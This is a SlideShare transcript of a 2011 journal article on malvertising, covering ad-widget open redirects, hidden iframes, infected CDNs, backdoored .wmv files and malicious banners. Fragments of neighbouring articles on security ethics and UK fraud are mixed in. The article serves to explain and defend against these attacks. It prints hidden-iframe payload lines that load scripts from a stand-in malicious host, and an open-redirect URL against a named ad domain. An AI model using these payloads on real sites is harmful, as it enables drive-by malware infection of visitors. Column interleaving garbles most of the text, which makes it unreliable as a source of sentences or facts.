FEATUREwhich he describes as “a bit basic”, will       purposes by commandeering more than               The next step wil...
FEATURE                                                                                                      order to redi...
FEATUREFor example, we detected a widget vulner-ability in a popular news publisher web-site. The normal procedure is for ...
FEATURE                                                                                                 Player files and J...
FEATURE• Attackers update the database with    malicious iframes by exploiting SQL    injections in order to trigger persi...
FEATURE• ‘Active X Controls’. Microsoft.             References                                    4. Sood, AK. ‘Open Redi...
Upcoming SlideShare
Loading in...5

Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Transcript of "Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal"

  1. 1. FEATUREwhich he describes as “a bit basic”, will purposes by commandeering more than The next step will be to host an ongo-make in and of themselves. While he says 21,000 computers around the world. ing series of workshops over the next 12that the “unification of views” from dis- Carolina canvassed the opinions of a months or so and to circulate reportsparate industry bodies can only be a good number of information security prac- based on the outcomes to members of thething, he points out that their value to the titioners as to whether they considered working group, although other individu-industry is likely to remain limited “until the move right or wrong. The responses, als will be invited to join as appropriate.and unless businesses [rather than individual which ranged from “it’s absolutely appall- “If this gains traction and popular sup-practitioners] are made fully aware of their ing and law enforcement should throw port, we might be able to start abstractingexistence and accept and embrace them”. the book at them” to “they deserve to get out basic principles to describe what ethical “It’s a good starting point if only for an award” – which, incidentally, they later practices are and maybe write them down asdebate such as this,” he says, “but it will did – prompted him to explore what ethi- a rule set,” Carolina says. “But if we do that,be interesting to see the status of the cal guidance was currently available, most it will only be published with highlightedprinciples in a year’s time.” of which he found unhelpful. case studies as you have to have examples As a result, as of early February this and context. In my professional opinion,Ethics project year, Carolina kicked off the first in a without that, it’s not much value.” series of ethics workshops, made up of While such initiatives are, unfortu-Meanwhile, another potential step on no more than 25 IISP members. “This is nately, still rather fragmented in nature,the road to professionalisation is the an area where people are crying out for what they would appear to suggest iscreation of an initiative entitled the guidance, especially in the private sector,” that the information security industry isInformation Security Ethics Project, he says. “We want practitioners to have slowly starting to move down the pathwhich is sponsored by and housed better information so that they feel less of becoming more professionalised.within the UK’s Institute of Information exposed and better informed to make As Gillespie concludes: “Things areSecurity Professionals (IISP). hard decisions.” changing. There are lots of pockets of The idea behind the project came work being done and, while they’refrom the Institute’s general counsel, Things are changing not consistent or global, you can see aRobert Carolina, who is also a sen- day when the industry will get there –ior visiting fellow at Royal Holloway The half-day discussion centred on a series although it’s a long road yet.”University’s information security group, of hypothetical case studies that werewhere he teaches in its information secu- used to debate the right and wrong ways About the authorrity MSc programme. to respond in each scenario and, most Cath Everett is a freelance journalist who In early 2009, Carolina wrote an article importantly, why. The aim was to look for has been writing about business and tech-for Computer Weekly about the legal- points of commonality and difference in nology issues since 1992. Her special areasity – or otherwise – of the actions of the individuals’ beliefs and approaches and to of focus include information security, HR/BBC’s Click TV programme team when use those areas where opinion diverged as management and skills issues, marketingit created its own botnet for educational the basis for further discussion. and high-end software.Malvertising – exploitingweb advertisingAditya K Sood, Richard J Enbody, Michigan State UniversityOnline advertisements provide a convenient platform for spreading malware.Since ads provide a significant portion of revenue on the web, significant effort can be redirected. Of particular use tois put into attracting users to them. Malicious agents take advantage of this malicious agents is that redirection isskillful attraction and then redirect users to malicious sites that serve malware. built into online advertising so the mali- cious user only needs to co-opt a redirec-Search engines’ intimate tie-in with significant effort goes into attracting tion that is taking place. As a bonus, theadvertising also assists malicious agents: users to particular sites from which users user expects a redirection to take place, so 11April 2011 Computer Fraud & Security
  2. 2. FEATURE order to redirect traffic from malver- tisements that are distributed across the World Wide Web. When a user clicks on a malvertisement, the traf- fic is redirected towards a malicious domain rather the legitimate one. • Generally, no verification check can be imposed on advertisements to detect whether the redirect occurs appropriately or not. This lack of verification results from the nature of the web-advertising model that makes it difficult for a publisher to scrutinise web traffic related to ad delivery. • Attackers can also tamper with spon- sored links to distribute malicious executables directly into the system as a part of drive-by-download infection. Internet Explorer has been a popular target because of both its popularity and its ability to run custom exploits through ActiveX controls [8]. The irony is that advertisers pay the publishers for the advertisements while the attackers exploit those same ads to spread malware. Malvertising modes Most of the web malware is triggered through web injections to exploit the vul- nerabilities in web software and domains.Figure 1: Registering a widget on a vulnerable advertising domain. Different modes of infections are used for injecting malicious advertisementsthe redirection to a malicious site is less it is hard to determine the integrity of in vulnerable domains. To appreciateof a red flag. content that is shared among different the severity and prevalence of this class Another feature of online advertis- domains across the web. of attack, the Open Web Applicationing that can be co-opted by malicious The result is that online marketing has Security Project (OWASP) recently placedagents is the dynamic delivery of ads. A opened up new avenues for profit gen- invalidated redirects and forwards in itsstandard approach is to provide HTML eration while at the same time providing 2010 ‘top 10’ list.2code snippets that are used in conjunc- a convenient platform for malware deliv-tion with normal websites in order to ery. Malvertising growth is being assisted Malvertising withembed advertisements. For example, by the following:Doubleclick.net provides millions of ads • Malicious agents can register nearly malicious widgetsthat are served to different domains as any domain and can use it as a stor- and redirectiondynamic content – that is, the content of age base for malware in order to con- The advent of Web 2.0 popularisedadvertisements can change dynamically duct drive-by-download attacks by widgets for use in advertising and trafficbased on user or content characteristics. redirecting users to their malicious redirection.3 However, flaws in the designService Level Agreements (SLA) exist domains.1 Generally, these types of of some web widgets pose high risks tobetween ad distributor and website to domains do not comply with any domains using those widgets for advertis-define appropriate content, but they are types of security or privacy standards. ing.4 As mentioned above, the redirectionneither designed for nor appropriate for • Malicious agents can use different can be co-opted by malicious users toapplying effective security. In particular, modes of malvertising infections in redirect traffic to malicious sites.12 Computer Fraud & Security April 2011
  3. 3. FEATUREFor example, we detected a widget vulner-ability in a popular news publisher web-site. The normal procedure is for a userto register, which allows the publisher torender news from various popular chan-nels and embed them into the user’s web-sites and blogs. However, because of flawsin the publisher’s system, it’s possible toredirect traffic. In order to install the widget, the pub-lishing domain requires certain steps tobe performed by a user to facilitate theability of the widget to include third-party content. Specifically:• The widget can only be installed after Figure 2: Installed widget. registration. The user selects the wid- get code based on the target platform – such as blogger, MySpace etc – in the vulnerable publishing domain as HTTP specification includes the iframe which the widget is to be installed. follows, where ‘outbrain.com’ is a vulner- to embed one web page into another.• Once the registration is complete, the able advertising domain and ‘xsstesting- Iframes can be used to load dynamic publisher requires the user to log in blog’ is a blog that serves malware: content for advertising. This functional- to his or her website or blog so that ity of iframes can be exploited to trigger widget installation can be completed. http://outbrain.com/most-viewed. infections. Iframes are used extensively After installation, the publisher starts action?sourceUrl=http://www. in order to bypass Same Origin Policy sending news and advertisements to xsstestingblog.blogspot.com (SOP) and launch a Cross Domain the registered user website. Attack (CDA).5,6 Attackers can easily• After the widget is embedded in the Step 3: Users who go to the widget embed hidden iframes that serve mal- user’s site, the user is able to receive thinking that they are entering the pub- vertisements in order to spread malware random content from various content lisher’s site find themselves redirected to while interacting with legitimate users. providers through a vulnerable adver- the attacker’s site. A successful attack can Usually, iframes are exploited using the tising domain that acts as an interme- be seen as a response request mechanism following procedures for running mali- diate service provider. in Figure 3. cious code: For advertising purposes, the vulner- This attack is the outcome of a design 1. Scripts in iframes are allowed to executeable publishing domain uses redirec- bug in the widget implementation. in the context of the browser process (thetion links in order to advertise on the Attackers can exploit this scenario by more powerful the context, the greaterpublisher’s website. However, web traffic generating malicious advertisements the vulnerability that can be exploited).can be easily redirected from where the (using the publisher’s name) that are 2. There is no specific security restrictionwidget is installed to any domain. This embedded with redirected URLs which on Active X object usage.shows that inclusion of the widget in exploit the design bug in the vulner- 3. Browser redirection can be done easilyany random domain can result in traffic able publishing domain in order to through iframes.redirection from a vulnerable publisher’s execute redirection towards the malicious 4. Access to local objects is not restrictedwebsite through advertising links. The domain. This shows how a vulnerable completely.attacker can exploit this scenario by per- advertising widget can be subverted by The hidden iframes used for malvertis-forming three steps: an attacker. ing are constructed as follows: Step 1: The attacker registers as alegitimate user (in order to get a widget <iframe src=“http://www.malicious.com/for inclusion in some domain) as shown mal_ad.js “ width=1 height=1 style=“visibiin Figure 1. The widget is included in Hidden iframes are one way for attack- lity:hidden;position:absolute”></iframe>the same domain as shown in Figure 2. ers to hide the objects that are used Step 2: The attacker can activate the for spreading malware. The concept <iframe src=“http://www.malicious.com/apparently dead vulnerability through of hidden infection is not new, but software_ad.js” width=0 height=0></hyperlinks by activating the URL from here we show a different variation. The iframe> 13April 2011 Computer Fraud & Security
  4. 4. FEATURE Player files and Javascript extensively. However, this is a grave concern because if a CDN server is exploited, the attacker can inject malicious code in the form of mal- vertisements and that code is widely dis- tributed. There is a chain reaction because if a parent server is infected, the child nodes will automatically get infected, too. Corrupting a server that serves thousands of sites spreads the malvertisements broadly and often in a trusted manner. We have identified Windows Media Player files being used in malvertisingFigure 3: Victim browser successfully gets redirected to the malware domain. for spreading malware. An attacker can perform the following steps in order to In addition, attackers can hide their for inline infections so that the detection design and inject malicious .wmv files asmalicious purpose using Javascript process becomes harder. malvertisements:obfuscation techniques to encode the Step 1: The attacker ‘backdoors’ themalicious links. Iframes possess a default Malvertising through .wmv file using Windows Script Editor,inherited flaw of defining a trust rela- with malicious code (as presented intionship between different domains that infected Content Figure 4) that executes through Crossare communicating with each other. The Delivery Networks Site Scripting (XSS) attacks.trust relationship cannot be determined A Content Delivery Network (CDN) Step 2: The attacker injects this .wmvevery time within different domains that is a third-party ad server that provides file in an iframe and injects the code inare sharing content. content to different domains across the a vulnerable CDN domain. When this The inability to precisely determine web. CDNs are the preferred choice for file is distributed across domains, it startstrust is why it is very hard to restrict the attackers to spread malware by exploiting spreading the malicious XSS file andcontent present in iframes and why it the CDN web servers – the attackers can bypasses the Internet Explorer XSS filteris executed in the context of the parent simply let the servers assist in spreading as shown in Figure 5.website. Attackers load malvertisements the malware. Advertisements use Flash, As you can see, CDNs have the poten-in iframes to run in the parent domain Silverlight, pop-ups, Windows Media tial to be a big problem with respect to web malware. Malvertising through malicious banners Advertising banners are used exten- sively in order to spread infections.7 Primarily, attackers exploit servers that host a number of websites on a single server – a common scenario. As above, attacking servers is an easy way to infect a large number of websites. In addition, since advertising banners are widespread, an attack through them will also be widespread. In this attack, the attackers exploit an XSS flaw or SQL injection vulnerability in websites hosted on the server in order to take full control. The attacker then uses two specific tech-Figure 4: Designing a .wmv file backdoor. niques to infect websites with malicious banners as follows:14 Computer Fraud & Security April 2011
  5. 5. FEATURE• Attackers update the database with malicious iframes by exploiting SQL injections in order to trigger persistent infections.• Attackers compromise the shared hosting server and use automated scripts to render malicious code on the main web page of different hosts. When a user visits a specific website,malicious banners are displayed alongwith dynamic content. Click on the ban-ner and the user is infected, or simply dis-playing the banner can lead to infection. Figure 5: WMV file is spreading malicious VbScript file. This trick can be used in conjunc-tion with SEO poisoning in which anattacker coerces a search engine to visit are becoming one of the main sources of pending on hardware buffer-overflow pro-malicious domains or hijacked websites spreading web malware. One reason for tection, which will prevent most computerthat display malicious banners. their popularity is a dearth of appropri- worms and viruses. He recently co-authored ate security procedures for content shar- a CS1 Python book, The Practice ofSolutions ing. For example, merely signing an SLA Computing using Python. does not ensure security and integrity• The design of web applications and in a shared network. There is a pressing Resources widgets should be thoroughly veri- need for rigorous security policies and • Polychronakis, Michalis; fied before allowing their use in a procedures to curb the risk of this type Mavrommatis, Panayiotis; Provos, production environment. The widget of infection. History indicates that it is Niels. ‘Ghost Turns Zombie: should be installed with appropriate impossible to get rid of malware infec- Exploring the Life Cycle of Web- access controls in order to avoid any tions completely, but continuous efforts based Malware’. Accessed Mar 2011. rogue actions. can contribute towards enhancing the <http://www.usenix.org/event/leet08/• The interface communication chan- security of our networks. tech/full_papers/polychronakis/poly- nel between an installed widget and chronakis.pdf>. a parent website should be moni- About the authors • Provos, Niels; McNamee, Dean; tored to catch the traffic redirection. Aditya K Sood is a security researcher, con- Mavrommatis, Panayiotis; Wang, Ke; Generally, the main website should sultant and PhD candidate at Michigan Modadugu, Nagendra. ‘The Ghost in not allow redirection in an open man- State University. He has worked in the the Browser: Analysis of Web-based ner without restricted control. security domain for Armorize, COSEINC Malware’. Accessed Mar 2011. <http://• Appropriate configuration should be and KPMG and founded SecNiche Security. www.usenix.org/event/hotbots07/tech/ used in shared hosting environments. He has been an active speaker at confer- full_papers/provos/provos.pdf>. The servers should be audited regularly ences such as RSA, Toorcon, Hacker Halted, • Ford, Sean; Cova, Marco; Kreugel, in order to detect any vulnerable hosts. TRISC, EuSecwest, XCON, OWASP Christopher; Vigna, Giovanni.• A live malware monitoring system AppSec, CERT-IN and has written content ‘Analyzing and Detecting Malicious should be used for dedicated and for HITB Ezine, ISSA, ISACA, Elsevier, Flash Advertisements’. Accessed Mar shared hosting servers in order to trace Hakin9 and Usenix Login. 2011. <http://www.cs.ucsb.edu/~chris/ malware infections at inception. research/doc/acsac09_flash.pdf>.• Systems should be updated with the Dr Richard Enbody is an Associate Professor • ‘Some 1.3 million malicious ads latest software and patches. in the Department of Computer Science and served daily’. SC Magazine, 18 May Engineering, Michigan State University. 2010. Accessed Mar 2011. <http://Conclusion He joined the faculty in 1987 after earn- www.scmagazineus.com/report-some- ing his PhD in Computer Science from 13-million-malicious-ads-served-We’ve covered the essential dynamics the University of Minnesota. His research daily/article/170414/>.of malvertising and the attack strategies interests are in computer security, computer • ‘Pay Per Click’. Wikipedia. Accessedused to distribute malicious advertise- architecture, web-based distance education Mar 2011. <http://en.wikipedia.org/ments across domains. Malvertisements and parallel processing. He has two patents wiki/Pay_per_click>. 15April 2011 Computer Fraud & Security
  6. 6. FEATURE• ‘Active X Controls’. Microsoft. References 4. Sood, AK. ‘Open Redirect Wreck Accessed Mar 2011. <http://msdn. 1. Cova, M; Kruegel, C; Vigna, G. Off ’. HITB EZine. Accessed Mar microsoft.com/en-us/library/ ‘Detection and Analysis of Drive- 2011. <http://magazine.hitb.org/ aa751968%28v=vs.85%29. by-Download Attacks and Malicious issues/HITB-Ezine-Issue-004.pdf>. aspx>. JavaScript Code’. In Proceedings of 5. ‘Same Origin Policy’. W3C. Accessed• Danchev, Dancho. ‘MSN Norway World Wide Web Conference, 2010. Mar 2011. <http://www.w3.org/ serving Flash exploits through mal- 2. OWASP top 10 Attack Vectors 2010. Security/wiki/Same_Origin_Policy>. vertising’. ZDNet, 27 Aug 2008. Accessed Mar 2011. <http://www. 6. ‘Client-Side Cross-Domain Security’. Accessed Mar 2011. <http://www. owasp.org/index.php/Top_10_2010- Microsoft. Accessed Mar 2011. zdnet.com/blog/security/msn-nor- Main>. <http://msdn.microsoft.com/en-us/ way-serving-flash-exploits-through- 3. Nations, Daniel. ‘What’s the library/cc709423%28v=vs.85%29. malvertising/1815>. Difference Between a Widget and a aspx>.• ‘SEO Poisoning Attacks Growing’. Gadget?’. About.com Web Trends. 7. ‘Content Delivery and Distribution Security Focus, 12 Mar 2008. Accessed Mar 2011. <http://webt- Services’. Web Caching. Accessed Accessed Mar 2011. <http://www. rends.about.com/od/widgets/a/widget- Mar 2011. <http://www.web-cach- securityfocus.com/brief/701>. gadget.htm>. ing.com/cdns.html>.The UK fraud landscapefor financial servicesDuncan Ash, SAS UK Duncan AshFraud in the financial services industry is a topic that constantly makes headlines,but is the situation really as dire as the media would have us believe? Well, accord-ing to the recent statistics from the National Fraud Authority (NFA), released 27 ware. The NFA figures show that onlineJanuary 2011, fraud is costing the UK over £38bn a year. In particular, the finan- banking has seen an increase of 14%cial services industry recorded the highest loss to fraudsters at £3.6bn. However, (£60m) in fraud losses compared with theon a more positive note this actually represented a slight decrease on the 2010 previous year. As such, the sector mustAnnual Fraud Indicator figure of £3.8bn due to improved fraud prevention meth- continue to invest in anti-fraud systemsods involving plastic card fraud (£440m) and cheque fraud (£30m). and solutions to help stay one step ahead of the criminals.Reducing levels of card fraud in particular banks and retailers have all contributed to However, because of the great varia-have been cited as a success story in the the decline in losses. tion between the security levels of onlinefight against fraudsters, with the latest sites and the increased measures thatfigures from The UK Cards Association A moving target merchants can take to protect them-(6 October 2010) revealing that total selves, there is a growing acceptance infraud losses on UK cards fell to £186.8m Unfortunately, criminals tend to be the banking industry that not all fraudbetween January and June 2010 – a 20% opportunistic and are always on the in the online channel can be conquered.reduction compared with losses in the lookout for the next weak link in the sys- Instead, the industry is positioning itselffirst half of 2009. This figure represented tem that can be exploited. According to to pick and choose its battles, ensuringthe lowest half-year total for 10 years, Financial Fraud Action UK (12 January that damage can be limited and con-and the reduction was attributed to the 2010), more than 50% of regular UK sumer confidence left intact.success of a number of banking industry Internet users (41.4 million) are now Moreover, the latest Fraudscape reportinitiatives. For instance, the increasing banking online. This substantial growth from CIFAS, the UK’s fraud preventionroll-out of chip and PIN in the UK and in popularity of the online channel in service, issued in March 2011, depicts theabroad, a greater number of sign-ups to recent years, both in terms of Internet continuing migration of fraud to new sec-MasterCard SecureCode and Verified by shopping and online banking, has led to tors: fewer bank accounts and plastic cardsVisa by cardholders and retailers, and the an increased number of attacks, in partic- were targeted by fraudsters (15% and 37%increasing use of fraud detection tools by ular through phishing and financial mal- decreases respectively) only to be offset16 Computer Fraud & Security April 2011